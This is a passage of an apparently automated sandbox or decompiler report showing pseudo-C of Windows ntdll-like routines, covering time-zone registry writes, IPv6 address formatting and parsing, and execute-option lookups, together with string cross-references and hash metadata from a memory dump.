                                                              							_t318 = 0;
                                                              							goto L46;
                                                              						}
                                                              					}
                                                              					_t257 = _v24;
                                                              					_t322 = _t257 + 4;
                                                              					_push(_t257);
                                                              					_v40 = _t322;
                                                              					E00A6718A(_t257);
                                                              					_t338 = _t335 + 4;
                                                              					if(_t322 == _t318) {
                                                              						_v20 = _t318;
                                                              					} else {
                                                              						_v20 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              					}
                                                              					if(_v20 == _t318) {
                                                              						_v40 = _t318;
                                                              						goto L58;
                                                              					} else {
                                                              						E00A42340(_v20, _v8, _v24);
                                                              						_v16 = _v20;
                                                              						_a4 = _t318;
                                                              						_t261 = E00A5E679(_v20, _t332);
                                                              						_t335 = _t338 + 0x14;
                                                              						while(1) {
                                                              							_v12 = _t261;
                                                              							if(_t261 == _t318) {
                                                              								break;
                                                              							}
                                                              							_v12 = _v12 + 2;
                                                              							 *_v12 = 0;
                                                              							E00A4E2A8(_v12,  &_v68, _v16);
                                                              							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              							_v16 = _v12;
                                                              							_t261 = E00A5E679(_v12, _t332);
                                                              							_pop(_t322);
                                                              						}
                                                              						_t269 = _v16;
                                                              						if( *_v16 != _t318) {
                                                              							E00A4E2A8(_t322,  &_v68, _t269);
                                                              							if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              								_a4 = _a4 + 1;
                                                              							}
                                                              						}
                                                              						if(_a4 == _t318) {
                                                              							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                              							_v40 = _t318;
                                                              							_v20 = _t318;
                                                              						}
                                                              						if(_v8 != _t318) {
                                                              							E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              						}
                                                              						_v8 = _t318;
                                                              						goto L30;
                                                              					}
                                                              				}
                                                              				_t284 = _v24;
                                                              				_t322 = _t284 + 4;
                                                              				_push(_t284);
                                                              				_v48 = _t322;
                                                              				E00A6718A(_t284);
                                                              				_t339 = _t335 + 4;
                                                              				if(_t322 == _t318) {
                                                              					_v28 = _t318;
                                                              				} else {
                                                              					_v28 = E00A4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                              				}
                                                              				if(_v28 == _t318) {
                                                              					_v48 = _t318;
                                                              					goto L58;
                                                              				} else {
                                                              					E00A42340(_v28, _v8, _v24);
                                                              					_v16 = _v28;
                                                              					_a4 = _t318;
                                                              					_t288 = E00A5E679(_v28, _t332);
                                                              					_t335 = _t339 + 0x14;
                                                              					while(1) {
                                                              						_v12 = _t288;
                                                              						if(_t288 == _t318) {
                                                              							break;
                                                              						}
                                                              						_v12 = _v12 + 2;
                                                              						 *_v12 = 0;
                                                              						E00A4E2A8(_v12,  &_v68, _v16);
                                                              						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              						_v16 = _v12;
                                                              						_t288 = E00A5E679(_v12, _t332);
                                                              						_pop(_t322);
                                                              					}
                                                              					_t296 = _v16;
                                                              					if( *_v16 != _t318) {
                                                              						E00A4E2A8(_t322,  &_v68, _t296);
                                                              						if(E00A65553(_t328,  &_v68,  &_v36) != 0) {
                                                              							_a4 = _a4 + 1;
                                                              						}
                                                              					}
                                                              					if(_a4 == _t318) {
                                                              						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                              						_v48 = _t318;
                                                              						_v28 = _t318;
                                                              					}
                                                              					if(_v8 != _t318) {
                                                              						E00A4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                              					}
                                                              					_v8 = _t318;
                                                              					goto L17;
                                                              				}
                                                              			}






































                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 00A687C1
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00A687E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 00A689FC
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00A68827
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00A68914
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                              • Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
                                                              • Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                              • Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E00AD822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
                                                              				char _v8;
                                                              				void* __ebx;
                                                              				signed int _t41;
                                                              				void* _t42;
                                                              				signed int* _t50;
                                                              				void* _t71;
                                                              				void* _t73;
                                                              				void* _t78;
                                                              				signed int _t81;
                                                              				void* _t84;
                                                              
                                                              				_push(__ecx);
                                                              				_t81 = _a4;
                                                              				_t84 = 0x20;
                                                              				_t71 = E00AF5A34(_t81 + 4, _t84);
                                                              				if(_t71 < _t84) {
                                                              					_t41 = E00AF5A34(_t81 + 0x58, _t84);
                                                              					_pop(_t78);
                                                              					_a4 = _t41;
                                                              					__eflags = _t41 - _t84;
                                                              					if(_t41 >= _t84) {
                                                              						goto L1;
                                                              					} else {
                                                              						_t42 = E00A97DCD(1,  &_v8);
                                                              						__eflags = _t42;
                                                              						if(__eflags >= 0) {
                                                              							__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
                                                              							if(__eflags < 0) {
                                                              								L14:
                                                              								_a4 = 0;
                                                              								_t73 = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
                                                              								__eflags = _t73;
                                                              								if(__eflags >= 0) {
                                                              									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                              									_t50 =  &_a8;
                                                              									goto L16;
                                                              								}
                                                              							} else {
                                                              								_t8 = _t71 + 2; // 0x2
                                                              								__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
                                                              								if(__eflags < 0) {
                                                              									goto L14;
                                                              								} else {
                                                              									_t71 = 4;
                                                              									__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
                                                              									if(__eflags < 0) {
                                                              										goto L14;
                                                              									} else {
                                                              										__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
                                                              										if(__eflags < 0) {
                                                              											goto L14;
                                                              										} else {
                                                              											__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
                                                              											if(__eflags < 0) {
                                                              												goto L14;
                                                              											} else {
                                                              												__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
                                                              												if(__eflags < 0) {
                                                              													goto L14;
                                                              												} else {
                                                              													__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
                                                              													if(__eflags < 0) {
                                                              														goto L14;
                                                              													} else {
                                                              														__eflags = _a8 - 0x1b0;
                                                              														if(__eflags < 0) {
                                                              															goto L14;
                                                              														} else {
                                                              															_t73 = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
                                                              															__eflags = _t73;
                                                              															if(__eflags >= 0) {
                                                              																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
                                                              																_t50 =  &_a4;
                                                              																L16:
                                                              																_t73 = E00AD810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
                                                              															}
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              							E00A3F9F0(_v8);
                                                              							_t42 = _t73;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					_t42 = 0xc000000d;
                                                              				}
                                                              				return _t42;
                                                              			}














                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: _wcsnlen
                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                              • API String ID: 3628947076-1387797911
                                                              • Opcode ID: 7c5c1557248890d3817cf1ac6c15bac1c61e98b142bffdc3d893e54a37e3031b
                                                              • Instruction ID: 55914cb78dfe7819f5786f9b474f5e601d7197991163e060ce595098e83ad98d
                                                              • Opcode Fuzzy Hash: 7c5c1557248890d3817cf1ac6c15bac1c61e98b142bffdc3d893e54a37e3031b
                                                              • Instruction Fuzzy Hash: 1441C975340308BEEB019A91CE42FDF77ACAF04B44F100213BB06D9291DBB4DB148BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 38%
                                                              			E00A813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr* _v16;
                                                              				intOrPtr _v20;
                                                              				char _v24;
                                                              				intOrPtr _t71;
                                                              				signed int _t78;
                                                              				signed int _t86;
                                                              				char _t90;
                                                              				signed int _t91;
                                                              				signed int _t96;
                                                              				intOrPtr _t108;
                                                              				signed int _t114;
                                                              				void* _t115;
                                                              				intOrPtr _t128;
                                                              				intOrPtr* _t129;
                                                              				void* _t130;
                                                              
                                                              				_t129 = _a4;
                                                              				_t128 = _a8;
                                                              				_t116 = 0;
                                                              				_t71 = _t128 + 0x5c;
                                                              				_v8 = 8;
                                                              				_v20 = _t71;
                                                              				if( *_t129 == 0) {
                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                              						goto L5;
                                                              					} else {
                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                              						if(_t96 != 0) {
                                                              							L38:
                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                              								goto L5;
                                                              							} else {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                              								L36:
                                                              								return _t128 + _t86 * 2;
                                                              							}
                                                              						}
                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                              						if(_t114 == 0) {
                                                              							L33:
                                                              							_t115 = 0xa42926;
                                                              							L35:
                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                              							_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                              							goto L36;
                                                              						}
                                                              						if(_t114 != 0xffff) {
                                                              							_t116 = 0;
                                                              							goto L38;
                                                              						}
                                                              						if(_t114 != 0) {
                                                              							_t115 = 0xa49cac;
                                                              							goto L35;
                                                              						}
                                                              						goto L33;
                                                              					}
                                                              				} else {
                                                              					L5:
                                                              					_a8 = _t116;
                                                              					_a4 = _t116;
                                                              					_v12 = _t116;
                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                              							_v8 = 6;
                                                              						}
                                                              					}
                                                              					_t90 = _v8;
                                                              					if(_t90 <= _t116) {
                                                              						L11:
                                                              						if(_a8 - _a4 <= 1) {
                                                              							_a8 = _t116;
                                                              							_a4 = _t116;
                                                              						}
                                                              						_t91 = 0;
                                                              						if(_v8 <= _t116) {
                                                              							L22:
                                                              							if(_v8 < 8) {
                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                              								_t128 = _t128 + E00A77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                              							}
                                                              							return _t128;
                                                              						} else {
                                                              							L14:
                                                              							L14:
                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                              									_push(":");
                                                              									_push(_t71 - _t128 >> 1);
                                                              									_push(_t128);
                                                              									_t128 = _t128 + E00A77707() * 2;
                                                              									_t71 = _v20;
                                                              									_t130 = _t130 + 0xc;
                                                              								}
                                                              								_t78 = E00A77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                              								_t130 = _t130 + 0x10;
                                                              							} else {
                                                              								_push(L"::");
                                                              								_push(_t71 - _t128 >> 1);
                                                              								_push(_t128);
                                                              								_t78 = E00A77707();
                                                              								_t130 = _t130 + 0xc;
                                                              								_t91 = _a8 - 1;
                                                              							}
                                                              							_t91 = _t91 + 1;
                                                              							_t128 = _t128 + _t78 * 2;
                                                              							_t71 = _v20;
                                                              							if(_t91 >= _v8) {
                                                              								goto L22;
                                                              							}
                                                              							_t116 = 0;
                                                              							goto L14;
                                                              						}
                                                              					} else {
                                                              						_t108 = 1;
                                                              						_v16 = _t129;
                                                              						_v24 = _t90;
                                                              						do {
                                                              							if( *_v16 == _t116) {
                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                              									_a4 = _v12;
                                                              									_a8 = _t108;
                                                              								}
                                                              								_t116 = 0;
                                                              							} else {
                                                              								_v12 = _t108;
                                                              							}
                                                              							_v16 = _v16 + 2;
                                                              							_t108 = _t108 + 1;
                                                              							_t26 =  &_v24;
                                                              							 *_t26 = _v24 - 1;
                                                              						} while ( *_t26 != 0);
                                                              						goto L11;
                                                              					}
                                                              				}
                                                              			}





















                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                              • Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
                                                              • Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                              • Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 64%
                                                              			E00A77EFD(void* __ecx, intOrPtr _a4) {
                                                              				signed int _v8;
                                                              				char _v540;
                                                              				unsigned int _v544;
                                                              				signed int _v548;
                                                              				intOrPtr _v552;
                                                              				char _v556;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t33;
                                                              				void* _t38;
                                                              				unsigned int _t46;
                                                              				unsigned int _t47;
                                                              				unsigned int _t52;
                                                              				intOrPtr _t56;
                                                              				unsigned int _t62;
                                                              				void* _t69;
                                                              				void* _t70;
                                                              				intOrPtr _t72;
                                                              				signed int _t73;
                                                              				void* _t74;
                                                              				void* _t75;
                                                              				void* _t76;
                                                              				void* _t77;
                                                              
                                                              				_t33 =  *0xb22088; // 0x745f356a
                                                              				_v8 = _t33 ^ _t73;
                                                              				_v548 = _v548 & 0x00000000;
                                                              				_t72 = _a4;
                                                              				if(E00A77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                              					__eflags = _v548;
                                                              					if(_v548 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t62 = _t72 + 0x24;
                                                              					E00A93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                              					_t71 = 0x214;
                                                              					_v544 = 0x214;
                                                              					E00A4DFC0( &_v540, 0, 0x214);
                                                              					_t75 = _t74 + 0x20;
                                                              					_t46 =  *0xb24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                              					__eflags = _t46;
                                                              					if(_t46 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t47 = _v544;
                                                              					__eflags = _t47;
                                                              					if(_t47 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					__eflags = _t47 - 0x214;
                                                              					if(_t47 >= 0x214) {
                                                              						goto L1;
                                                              					}
                                                              					_push(_t62);
                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                              					E00A93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                              					_t52 = E00A50D27( &_v540, L"Execute=1");
                                                              					_t76 = _t75 + 0x1c;
                                                              					_push(_t62);
                                                              					__eflags = _t52;
                                                              					if(_t52 == 0) {
                                                              						E00A93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                              						_t71 =  &_v540;
                                                              						_t56 = _t73 + _v544 - 0x218;
                                                              						_t77 = _t76 + 0x14;
                                                              						_v552 = _t56;
                                                              						__eflags = _t71 - _t56;
                                                              						if(_t71 >= _t56) {
                                                              							goto L1;
                                                              						} else {
                                                              							goto L10;
                                                              						}
                                                              						while(1) {
                                                              							L10:
                                                              							_t62 = E00A58375(_t71, 0x20);
                                                              							_pop(_t69);
                                                              							__eflags = _t62;
                                                              							if(__eflags != 0) {
                                                              								__eflags = 0;
                                                              								 *_t62 = 0;
                                                              							}
                                                              							E00A93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                              							_t77 = _t77 + 0x10;
                                                              							E00ABE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                              							__eflags = _t62;
                                                              							if(_t62 == 0) {
                                                              								goto L1;
                                                              							}
                                                              							_t31 = _t62 + 2; // 0x2
                                                              							_t71 = _t31;
                                                              							__eflags = _t71 - _v552;
                                                              							if(_t71 >= _v552) {
                                                              								goto L1;
                                                              							}
                                                              						}
                                                              					}
                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                              					_push(3);
                                                              					_push(0x55);
                                                              					E00A93F92();
                                                              					_t38 = 1;
                                                              					L2:
                                                              					return E00A4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                              				}
                                                              				L1:
                                                              				_t38 = 0;
                                                              				goto L2;
                                                              			}

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A93F12
                                                              Strings
                                                              • j5_t, xrefs: 00A77F08
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A93F75
                                                              • (&y, xrefs: 00A77F1E
                                                              • Execute=1, xrefs: 00A93F5E
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A93EC4
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A93F4A
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A9E2FB
                                                              • ExecuteOptions, xrefs: 00A93F04
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A9E345
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: (&y$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$j5_t
                                                              • API String ID: 3901378454-4080450086
                                                              • Opcode ID: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                              • Instruction ID: 2a784f9344ce5951899d836ac6aa1627647f2453516e066c3cc4246061c2dc92
                                                              • Opcode Fuzzy Hash: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                              • Instruction Fuzzy Hash: 2B41B672A8021CBADF24DB94DDC6FEE73FCAB55700F0045A9F509E6081EA709B45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00A80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				void* _t108;
                                                              				void* _t116;
                                                              				char _t120;
                                                              				short _t121;
                                                              				void* _t128;
                                                              				intOrPtr* _t130;
                                                              				char _t132;
                                                              				short _t133;
                                                              				intOrPtr _t141;
                                                              				signed int _t156;
                                                              				signed int _t174;
                                                              				intOrPtr _t177;
                                                              				intOrPtr* _t179;
                                                              				intOrPtr _t180;
                                                              				void* _t183;
                                                              
                                                              				_t179 = _a4;
                                                              				_t141 =  *_t179;
                                                              				_v16 = 0;
                                                              				_v28 = 0;
                                                              				_v8 = 0;
                                                              				_v24 = 0;
                                                              				_v12 = 0;
                                                              				_v32 = 0;
                                                              				_v20 = 0;
                                                              				if(_t141 == 0) {
                                                              					L41:
                                                              					 *_a8 = _t179;
                                                              					_t180 = _v24;
                                                              					if(_t180 != 0) {
                                                              						if(_t180 != 3) {
                                                              							goto L6;
                                                              						}
                                                              						_v8 = _v8 + 1;
                                                              					}
                                                              					_t174 = _v32;
                                                              					if(_t174 == 0) {
                                                              						if(_v8 == 7) {
                                                              							goto L43;
                                                              						}
                                                              						goto L6;
                                                              					}
                                                              					L43:
                                                              					if(_v16 != 1) {
                                                              						if(_v16 != 2) {
                                                              							goto L6;
                                                              						}
                                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                              						L47:
                                                              						if(_t174 != 0) {
                                                              							E00A58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                              							_t116 = 8;
                                                              							E00A4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                              						}
                                                              						return 0;
                                                              					}
                                                              					if(_t180 != 0) {
                                                              						if(_v12 > 3) {
                                                              							goto L6;
                                                              						}
                                                              						_t120 = E00A80CFA(_v28, 0, 0xa);
                                                              						_t183 = _t183 + 0xc;
                                                              						if(_t120 > 0xff) {
                                                              							goto L6;
                                                              						}
                                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                              						goto L47;
                                                              					}
                                                              					if(_v12 > 4) {
                                                              						goto L6;
                                                              					}
                                                              					_t121 = E00A80CFA(_v28, _t180, 0x10);
                                                              					_t183 = _t183 + 0xc;
                                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                              					goto L47;
                                                              				} else {
                                                              					while(1) {
                                                              						_t123 = _v16;
                                                              						if(_t123 == 0) {
                                                              							goto L7;
                                                              						}
                                                              						_t108 = _t123 - 1;
                                                              						if(_t108 != 0) {
                                                              							goto L1;
                                                              						}
                                                              						_t178 = _t141;
                                                              						if(E00A806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                              							if(E00A806BA(_t135, _t178) == 0 || E00A80A5B(_t136, _t178) == 0) {
                                                              								if(_t141 != 0x3a) {
                                                              									if(_t141 == 0x2e) {
                                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                              											goto L41;
                                                              										} else {
                                                              											_v24 = _v24 + 1;
                                                              											L27:
                                                              											_v16 = _v16 & 0x00000000;
                                                              											L28:
                                                              											if(_v28 == 0) {
                                                              												goto L20;
                                                              											}
                                                              											_t177 = _v24;
                                                              											if(_t177 != 0) {
                                                              												if(_v12 > 3) {
                                                              													L6:
                                                              													return 0xc000000d;
                                                              												}
                                                              												_t132 = E00A80CFA(_v28, 0, 0xa);
                                                              												_t183 = _t183 + 0xc;
                                                              												if(_t132 > 0xff) {
                                                              													goto L6;
                                                              												}
                                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                              												goto L20;
                                                              											}
                                                              											if(_v12 > 4) {
                                                              												goto L6;
                                                              											}
                                                              											_t133 = E00A80CFA(_v28, 0, 0x10);
                                                              											_t183 = _t183 + 0xc;
                                                              											_v20 = _v20 + 1;
                                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                              											goto L20;
                                                              										}
                                                              									}
                                                              									goto L41;
                                                              								}
                                                              								if(_v24 > 0 || _v8 > 6) {
                                                              									goto L41;
                                                              								} else {
                                                              									_t130 = _t179 + 1;
                                                              									if( *_t130 == _t141) {
                                                              										if(_v32 != 0) {
                                                              											goto L41;
                                                              										}
                                                              										_v32 = _v8 + 1;
                                                              										_t156 = 2;
                                                              										_v8 = _v8 + _t156;
                                                              										L34:
                                                              										_t179 = _t130;
                                                              										_v16 = _t156;
                                                              										goto L28;
                                                              									}
                                                              									_v8 = _v8 + 1;
                                                              									goto L27;
                                                              								}
                                                              							} else {
                                                              								_v12 = _v12 + 1;
                                                              								if(_v24 > 0) {
                                                              									goto L41;
                                                              								}
                                                              								_a7 = 1;
                                                              								goto L20;
                                                              							}
                                                              						} else {
                                                              							_v12 = _v12 + 1;
                                                              							L20:
